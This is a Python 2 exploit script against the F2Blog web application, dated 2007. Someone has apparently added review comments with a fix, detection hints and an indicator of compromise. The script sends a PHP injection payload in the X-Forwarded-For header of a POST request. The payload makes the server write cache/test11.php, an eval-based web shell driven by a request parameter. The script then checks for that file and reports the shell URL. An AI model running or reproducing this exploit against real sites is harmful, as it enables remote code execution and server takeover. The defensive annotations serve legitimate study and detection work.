#!c:\python24\pyton # Exploit For F2Blog All Version # Author BY MSN:pt...@vip.sina.com # Date: Jan 29 2007
# Python 2 standard-library modules (httplib and urlparse were renamed in Python 3).
import sys
import httplib
from urlparse import urlparse
from time import sleep
def injection(realurl,path,evil): #url,/bk/,evilip
    """Send one POST carrying `evil` in a request header, then probe for the dropped file.

    Args:
        realurl: result of urlparse(); only index 1 (the network location) is used.
        path: URL path prefix ending in '/', e.g. '/bk/'.
        evil: value placed in the 'X-Forwarded- For' header entry; may be empty.

    Reads the module globals `useragent` and `shell`, which main() assigns before
    calling. Exits the process with status 1 when the probe response starts with
    'test'; otherwise prints a failure message and returns None.
    """
    # The POST body and the Cookie header are both empty, so 'Content-length' is 0.
    cmd=""
    cookie=""
    # Only the forwarded-for entry carries attacker-controlled content (`evil`).
    # String literals are reproduced exactly as they appear on the page.
    # NOTE(review): the PoC presumes the application copies this header value into
    # PHP code under cache/ -- confirm against the F2Blog source. The defensive fix
    # is to accept the header only when it parses as an IP address and never to
    # write request-derived text into a file the web server will execute.
    header={'Accept':'*/*','Accept-Language':'zh- cn','Referer':'http://'+realurl[1]+path+'index.php','Content- Type':'application/x-www-form-urlencoded','User- Agent':useragent,'Host':realurl[1],'Content-length':len(cmd), 'Connection':'Keep-Alive','X-Forwarded- For':evil,'Cookie':cookie}
    # Leftover, disabled debugging lines from the author:
    #cmd = "formhash=6a49b97f&referer=discuz.php&loginmode=&styleid=&cookietime=2592000&loginfield=username&username=test&password=123456789&questionid=0&answer=&loginsubmit= %E6%8F%90+%C2%A0+%E4%BA%A4"
    #print header
    #print path
    #sys.exit(1)
    # First connection: bodyless POST to index.php. Its response is never read.
    http = httplib.HTTPConnection(realurl[1])
    http.request("POST",path+"index.php",cmd, header)
    # Fixed one-second pause before probing.
    sleep(1)
    # Second connection: request the file the payload names. http1 is never closed.
    # NOTE(review): for detection, the visible pattern is a zero-length POST to
    # index.php with a non-IP forwarded-for value, followed about a second later
    # by a GET for cache/test11.php from the same client.
    http1 = httplib.HTTPConnection(realurl[1])
    http1.request("GET",path+"cache/test11.php")
    response = http1.getresponse()
    re1 = response.read()
    #print re1
    # Prints the offset of the marker text (-1 when absent).
    print re1.find('test')
    # Success is declared only when the body begins with the marker 'test'.
    if re1.find('test') ==0:
        print 'Expoilt Success!\n'
        print 'View Your shell:\t%s' %shell
        sys.exit(1);
    else:
        # The success branch exits the process, so these lines run only on failure.
        sys.stdout.write("Expoilt FALSE!")
        http.close()
        #sleep(1)
        #break
        sys.stdout.write("\n")
def main ():
    """Parse the target URL from argv, build the header payload and call injection() twice.

    Expects exactly one command-line argument (the blog's base URL); with any other
    argument count it prints usage text and exits with status 0. Assigns the module
    globals `shell` and `useragent`, which injection() reads.
    """
    print 'Exploit For F2Blog All Version'
    print 'Codz by pt...@vip.sina.com\n'
    if len(sys.argv) == 2:
        url = urlparse(sys.argv[1])
        # url[2:-1] is a slice of the parse result, not of the path string, so this
        # comparison with '/' is always true and a '/' is always appended.
        if url[2:-1] != '/':
            u = url[2] + '/'
        else:
            u = url[2] #u=/bk/
    else:
        print "Usage: %s <url> " % sys.argv[0]
        print "Example: %s http://127.0.0.1/bk" % sys.argv[0]
        sys.exit(0)
    print '[+] Connect %s' % url[1]
    print '[+] Trying...'
    print '[+] Plz wait a long long time...'
    global shell,useragent
    # URL that injection() reports on success; the same path it probes.
    shell="http://"+url[1]+u+"cache/test11.php"
    # PHP statement that writes cache/test11.php: a one-line script that eval()s the
    # request parameter `c`, followed by the literal marker 'test'.
    # NOTE(review): a cache/test11.php file with this content on a server is an
    # indicator of compromise; the cache directory should not be allowed to
    # execute PHP at all.
    query ='fputs(fopen(\'cache/test11.php\',\'w+\'),\'<? @eval($_REQUEST[c])?>test\')'
    # Wrapped with a leading "'));" and a trailing ";/*" -- presumably to close a
    # quoted string and two open calls in PHP the application generates and to
    # comment out what follows; inferred from the payload shape, not shown here.
    query ='\'));'+query+';/*'
    evilip=query
    # The User-Agent is sent empty; this local `cookie` is never used.
    useragent=""
    cookie=""
    # First request carries the payload in the forwarded-for header.
    injection(url,u,evilip)
    # Second request repeats the POST and probe with an empty header value; the
    # reason for the repeat is not evident from this file.
    evilip=""
    injection(url,u,evilip)
    print '[+] Finished'
# Run the proof-of-concept only when the file is executed as a script.
if __name__ == "__main__":
    main()